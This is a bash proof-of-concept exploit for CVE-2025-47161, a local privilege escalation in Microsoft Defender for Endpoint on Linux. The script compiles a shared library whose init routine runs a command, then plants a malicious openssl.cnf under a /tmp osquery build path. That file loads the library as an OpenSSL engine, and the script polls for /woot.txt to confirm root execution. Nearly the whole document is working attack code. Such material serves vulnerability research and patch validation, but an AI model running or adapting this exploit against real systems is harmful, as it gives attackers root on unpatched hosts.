#!/bin/bash
# Exploit Title: Microsoft Defender for Endpoint (MDE) - Elevation of Privilege
# Date: 2025-05-27
# Exploit Author: Rich Mirch
# Vendor Homepage: https://learn.microsoft.com/en-us/defender-endpoint/
# Software Link:
https://learn.microsoft.com/en-us/defender-endpoint/microsoft-defender-endpoint-linux
# Versions:
# Vulnerable March-2025 Build: 101.25012.0000 30.125012.0000.0
# Vulnerable Feb-2025 Build: 101.24122.0008 20.124112.0008.0
# Vulnerable Feb-2025 Build: 101.24112.0003 30.124112.0003.0
# Vulnerable Jan-2025 Build: 101.24112.0001 30.124112.0001.0
# Vulnerable Jan-2025 Build: 101.24102.0000 30.124102.0000.0
#
# Vendor Advisory:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47161
# Blog: http://stratascale.com/vulnerability-alert-cve202547161
# Tested on: Ubuntu 24.04.1 LTS and 24.04.2 LTS
# CVE : CVE-2025-47161
#
echo "MDE Version: $(mdatp version)"
# stage
cat >mde-exp.c<<EOF
/*
* Build procedure:
* gcc -fPIC -o woot.o -Wall -c woot.c
* gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o
*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
void woot(){
// for manual testing
if(isatty(STDERR_FILENO)) {
fprintf(stderr,"Woot!\n");
}
system("ps -ef > /woot.txt");
sleep(3000000);
}
EOF
# build exploit
gcc -fPIC -o woot.o -Wall -c mde-exp.c
gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o
mkdir -p /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/
cat > /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/openssl.cnf
<<EOF
# Malicious openssl.cnf
openssl_conf = openssl_init
[openssl_init]
engines = engine_section
[engine_section]
woot = woot_section
[woot_section]
engine_id = woot
dynamic_path = /tmp/woot.so
init = 0
EOF
echo "Checking every 15 seconds for /woot.txt"
while true
do
if [[ -f /woot.txt ]]
then
echo "WOOT - /woot.txt exists"
ls -ld /woot.txt
exit
fi
sleep 15
done